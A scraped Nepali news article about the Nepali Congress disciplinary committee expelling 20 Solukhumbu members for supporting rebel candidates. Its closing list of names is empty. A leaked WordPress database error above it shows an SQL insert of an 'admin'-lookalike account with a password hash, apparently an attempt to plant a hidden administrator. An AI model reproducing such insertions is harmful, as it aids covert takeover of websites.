WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BxAHSlwp6jaTcTY6hMnEGLIdq1bxqN.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-08 07:47:36', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ६ साउन, काठमाडौं । नेपाली काँग्रेस अनुशासण बिभागले सोलुखुम्बुका २० जना नेता तथा कार्यकर्तालाई पार्टीबाट निष्काशित गरेको छ ।
२०७४ सालमा सम्पन्न तीनवटै निर्वाचनमा वागी उमेद्वार, प्रस्तावक तथा समर्थक बसी पार्टीलाई असहयोग गरेको भन्दै कांग्रेसको केन्द्रीय अनुशासन समितिको सोमबार बसेको बैठकले निष्काशन गरेको हो । निर्वाचनमा पार्टीका आधिकारिक उमेदवारलाई असहयोग गर्ने देशैभरिका उमेद्वार, प्रस्तवक र समर्थलाई निस्कासन गरेको हो ।
अनुशासन समितिका संयोजक भीष्मराज आङ्दम्बेका अनुसार निर्वाचनमा पार्टीको आधिकारिक उमेदवार विरुद्ध वागी उमेदवार बनेका, निजका प्रस्तावक र समर्थक तथा अन्य पार्टीमा गई विभिन्न तहमा उमेदवारी दिएका नेता तथा कार्यकर्ताहरुलाई पार्टीको विधान बमोजिम कारबाही गरिएकोे हो ।
निर्वाचनमा वागी उमेदवारी दिएका, निजका प्रस्तावक र समर्थक तथा अन्य पार्टीमा गएर उमेदवारी दिएकाहरुको नामावली केन्द्रमा पठाउन अन्य जिल्लाहरुलाई पनि अनुशासन समितिले तत्काल नामावली पठाउन पुनः निर्देशन दिएको संयोजक आङ्दम्बेले जनाकारी दिए ।
समितिले यसअघि पनि विभिन्न जिल्लामा चुनावमा असहयोग गरेका नेता–कार्यकर्ताहरुलाई पार्टीबाट निष्कासन गरेको थियो ।
यी हुन पार्टीबाट निष्कासित नेता–कार्यकर्ताहरु

